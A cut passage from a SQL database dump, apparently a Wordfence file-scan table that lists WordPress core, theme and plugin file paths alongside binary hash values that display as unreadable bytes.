t','wp-content/themes/vega/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8{�gZ�C�c����','鮤���,��$��D���gGo^>���!x^5��','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��V�l���ĿW��1�','y�{�0��,�N����oq�+��.I9I��t','',0,'?'),('�k�3�������j8�y','wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��bK� �=f��{�Д','`��Իi ��c\'�ԭ��5�R���KMOe','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����gX�5\Z��X�','/u��$���R�A\Zg`Y@���B72�9','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KW?~���\rc��H','i�%>�\\6�L���{8������y�Z��AH�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JA휪��M�Y�~= �u','��\" 0���\nt�M�\"��B�a�X�-J','',0,'?'),('��ÿ�d��71ң/3m�','wp-content/plugins/wordfence/css/wf-font-awesome.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('��!�va��A 3','wp-content/plugins/wordpress-seo/languages/wordpress-seo-vi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{늝4�!�u53%j�R\Z','f}�J�$^������U�m���}\r������','',0,'?'),('�����Ƅ���NB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('��X�.6���8P{�','wp-content/uploads/2019/08/renewable-energy.jpg',0,'\0.��ȃ2oş=`b','\0.��ȃ2oş=`b','�\0/��!��w�ΐ�v�\n�\0R\n{�E��7�b','',0,'?'),('�̵���C(�;��j��','wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-social-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��{: 3;�\06�\'�','��T�F���_r�oM�b(�\r:�@ A��','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��hY)�W�\'�v\'�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/TaskQueueInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@=f��Qҳ`�}��p','\r�\'#��i����Ee˫��u�ΘS�r�r��','',0,'?'),('���I��(8�\r�rʢ�','wp-content/languages/en_GB-4bfa11da57ff2600004bb500368247f4.json',0,'6����ִ��w#�yX','6����ִ��w#�yX','Fu�/]���f��<\'�zN�w�����0���','',0,'?'),('���u�ۜ�*���','wp-content/plugins/disable-gutenberg/inc/settings-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ButO��I�����',')��-<\rYB &z��T�ag@�>�)�X��x�','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('��:����^� 6T4�','wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f����Wc7^\r���','Q�bo�1���[+i�<�X�`K)ͽW�,�0�','',0,'?'),('��0(�\ZJ�£��d','wp-content/plugins/wordpress-seo/languages/wordpress-seo-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7��qt�䃻�m`�3','M���l`W`M�cBs�8C�,�p?��b��','',0,'?'),('��x�����p��r','wp-content/uploads/2019/09/cleaning-3977589_960_720.jpg',0,'���*Lr�G�G+�g','���*Lr�G�G+�g','7h�l�p��e��p���!�2�هQ���ў','',0,'?'),('������8�j��c}�','wp-includes/blocks/rss/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XK��|�`�-���2\Z?','B�__����-��YtNY�7:�@4q�3�q�5���','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('� \n�6T���/���m','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�!m]\'�x�_�','�W���I�Y��T�įQ�.0(?��F���f#|�M','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I(vrMm�(�c\0{ \n','FO���V3\"���������!k�P�','',0,'?'),('�Hc���1�ް�=','wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݴ@�����+V�z�','v\\i~:Q��� ����<�4/�tA�����>D?o','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc ¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hl���6@�]aw��','�#� M��鞥��a^s�\n\' �/,���\Z}?K','',0,'?'),('�@V��T��L\'�~�i�','wp-content/plugins/wordpress-seo/admin/class-yoast-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#(�?l�Q\"iL(�','�_;soE���x��G*�b6�[�9n.��(��','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�I��Tݩ��~��7�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o9�����\nPG��,��','o�jY�F�J�q�AUS�*�D��.&�[P�.','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��.f:��Ϥ�F','',0,'?'),('�c����6��~�6̐','wp-includes/blocks/button/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$S���ay�I�ʡ.$','�J_k������~ �\\���5����','',0,'?'),('�v�h�a��|?�:t�-�','wp-content/uploads/2019/10/plumber-300x250.jpg',0,'��29�\\��n&��+<�','��29�\\��n&��+<�','�ň,��;�#h���dr�O������)�Q�\n�4','',0,'?'),('�y�a/�W\0�\n�hl���','wp-content/uploads/2019/10/plumbing4-350x220.jpg',0,'���@\0�(0>*r�','���@\0�(0>*r�','�+��F禮�§\Z1J�Y��=�\\*�Аb�','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�����ʊn���Z','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(�g�E I��+L�>�','!Z{�q_^c��yV�;����r�?�w����a�_','',0,'?'),('����\Z7�8�-\\�~�','wp-includes/css/dist/edit-post/classic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2q�s@*����','��h�GnT�f�}�u�Y�c�Ư���v�w�','',0,'?'),('��lv\"�(����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/ClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=i�<�A%�÷9� ','$SH���4�׃�&a;{,8��ta�`��O��Q','',0,'?'),('����-�\"h���','wp-content/plugins/wordpress-seo/src/models/seo-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�౯��ջ&�;�\rX','�V=B��_�(a��C�(��a=��4_`�U���','',0,'?'),('��3_���[#�g`�','wp-includes/css/dist/block-library/reset-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���<��U=���','׀���6`+���k\ZA��~W�9|�gR���v','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR ���Q�f�;\ne�\r�6\\','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N4\'8,�L�J �I4x','� �b��}�gD4��X\\�ܰ�,IM�Z�p�','',0,'?'),('��M(�A$\n�k�����','wp-content/plugins/wordpress-seo/languages/yoast-components-sk_SK.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�<r}\',���\"5','���K�s����!��ͅ��J�� ���W�U��','',0,'?'),('�� �\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('��3��U�3���PP�N�','wp-content/uploads/2019/10/plumbing3-768x432.jpg',0,'����o�)\r��լ]�','����o�)\r��լ]�','�}�>_h8�zj���&���(��$Uc��','',0,'?'),('��re}/�D���>','wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ޢ��@�� ��\\�','*��u�z����jM�T�j\0�ȫ���io1','',0,'?'),('���ꔕTs�\r%�LJ�M','wp-includes/blocks/spacer/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z#Ů�{��N���p','z���UԣYKu@W#��+�0��N�`qX��\"L ','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K� k����c��\'�','�r=,k�M:�Dy�K��F��~�sS�|ğ�Z��','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('����)1����','wp-content/plugins/wordpress-seo/admin/class-admin-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I8�Wef�g���','�%-N;γ5D�۸�d���V3S�C��yu��','',0,'?'),('�6��0��)H2�����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w\\�j��M�yl�','��S8{O1K��{�4��H�\\��#���z^5�','',0,'?'),('�\\�`7O+�8�t�C��','wp-content/plugins/redirection/locale/json/redirection-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\'gn5����%�86','�չI3�uS�w70�UԢ�%N<� i�Տ%��','',0,'?'),('��吠��*+B����$','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-ryte-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�m$���\r��f\Z,ñ','*&��ys;&��7�����/��M��JB��','',0,'?'),('�����Q����j����','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-150x150.jpg',0,'�ki8U��4��\Zb�','�ki8U��4��\Zb�','�3׀8�,�y�dB��ip�N>.�M�p��','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('��\'���i��3�����','wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-tool-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ME��\ZI0{^7�!�','������I\04��T�YSv��C9܂M@�','',0,'?'),('��&�ܕY̮&M���','wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-content-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��E�@u����','� ��쫁�B٥\'R�J�Rχ�\n��|84u�','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι ��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��*j`ʔ($(��ވ��','wp-content/uploads/2019/08/roof-300x250.jpg',0,'����p\'k!C%�','����p\'k!C%�','ځv+k\n�.�߬���1�wh1��\r�o�=Q��I','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�ڱ�hys$�9�','��5$��);5�X�@�D8������z��','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��R��P��2���','��\Zg�e���:I�z\nq�к>��[�m��h��','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�����WS�Rh?�I','� �\r��(�_�q*h7w@�L_C���s+','',0,'?'),('�$��A�o��i�>$','wp-content/plugins/wordpress-seo/languages/yoast-components-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�LW6fo3G�n\r!~','csRG� �ڟ~�,�M2%��B0�4�8���Pw','',0,'?'),('�&F�g��25xm��J&','robots.txt',0,'��ُ\0�� ��B~','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\'u��+��ִl��','wp-content/languages/en_GB-68f2cec7514bf8563c723a4d675fcfe6.json',0,'�i\"r�[/Z�<p�','�i\"r�[/Z�<p�','>�&���G��{���s)@+hR&f���/��','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�`-,T��?|Bb','��y��4�%��t,ͳ=iNGNCU�v�ic','',0,'?'),('�<4|[\Z��\np','wp-content/languages/plugins/wordpress-seo-en_GB.mo',0,'UV���|�߽[�`���','UV���|�߽[�`���','��ĥI��@ѩ�&Z��y e���B��$\0','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j���~�\\�˩��','�_weC�\\E4���^mZ4���-g\'As�o6','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�j�P>������G���F','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��H�5\n6�*j�','t�,�&��l�����<욜1��A��M�Pf^5N','',0,'?'),('�l_S� 9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rl�A�Hט뀏ׄj','�+�h�%23�^�K��#l]r�aBc\r��4��b','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e���(a�d�\Z�C','��\"����G��-��O��\'��B� �^','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\" ��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w� L�e�Fz�]�','',0,'?'),('����~\Z��%⟘����','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3 �:h)�7K�<�\\N�+','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��*��|#b���=|','wp-content/uploads/2019/08/nature-3336524_960_720-updraft-pre-smush-original.jpg',0,'+���X���ՙE�','+���X���ՙE�','\0��BAY@�Kد��YU$M�͜�i��k\"���R','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('���t��I��.����','wp-content/plugins/redirection/api/api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��#�k��4;�7V�','���i�uܭ�/�э�`=Z�YC�����`','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6����C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��c�R�f3�p5�','wp-content/plugins/redirection/modules/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p`�se��5XgC�\n��','bM[M�-��b\'�c~Tk�t���кG��','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{ /','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('��(�d�SR7�{L�Y�','wp-content/languages/en_GB-e2e4c4b80f3adf2c70b431bfdb1b4872.json',0,'.\';\\m>g�s.ǖy','.\';\\m>g�s.ǖy','k�g�fry:��_�`ƅ�j8k6Y�\"\"','',0,'?'),('�����JH�l\"G�L�','wp-includes/css/dist/block-library/reset-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�X����L�\Z','����\rH�{�f���G^�?U<�6�1','',0,'?'),('��1����K�@��','wp-content/plugins/wordpress-seo/admin/config-ui/factories/class-factory-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A4���4�}g���','�����\'�X- ;Nそ��.��Y���,t�','',0,'?'),('���`I�oms�S!�','wp-content/plugins/redirection/locale/redirection-en_GB.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','88c�<:�~�\n7�Ӥd','��5�]���4��r5^�����*�ex���Q%','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6���h ','',0,'?'),('�9�[�E:Ѷq ��A','wp-includes/blocks/calendar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��iw�hw�Z�1','5v���ɭ<�%�U��B#���5z�h]� ','',0,'?'),('�&½1YxFu����mpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۏ�5����e����~7','r|1��� P.�;FvrF���0^�ػ� �R^��','',0,'?'),('�*42/�>E�2','wp-content/plugins/redirection/locale/redirection-el.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��0P\0��%2��','�^����2�=����My���W��=�a\Z<l�t','',0,'?'),('�1��x�<���>k','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-bs_BA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UyJ� ��bݒ�','כ�eV�ɔ=�� �t��x|@��AO�����<','',0,'?'),('�J랿�h#�:!^`�=�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv,%�f�n���2T��','ᒠ�#0���q*n\\\\!����́\'�A%�!.k','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4� G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O^�F�ci�zJS','S�6{�F���Z0�C��r�c��\0\\T��:','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}x�oF�����_/�÷P','�N��m-�h.���\rp�xNIh��[@\'�U�A�','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�k�ϖх�X�','���/�\'C��?C\Zfb�%�$�=V6 �\\�','',0,'?'),('���2?��܋�<���','wp-content/languages/en_GB-8240df461220d1d3a028a9a4c5652a5b.json',0,'�t�D�\0R\0V�m�Е','�t�D�\0R\0V�m�Е','狣7�x��S��kpc�������w���ZKv','',0,'?'),('��!�V2��1O��J�','wp-content/plugins/wordpress-seo/languages/yoast-components-fr_BE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0)�ݱ!��J3�','�]��a�iCp;�r�\\�� 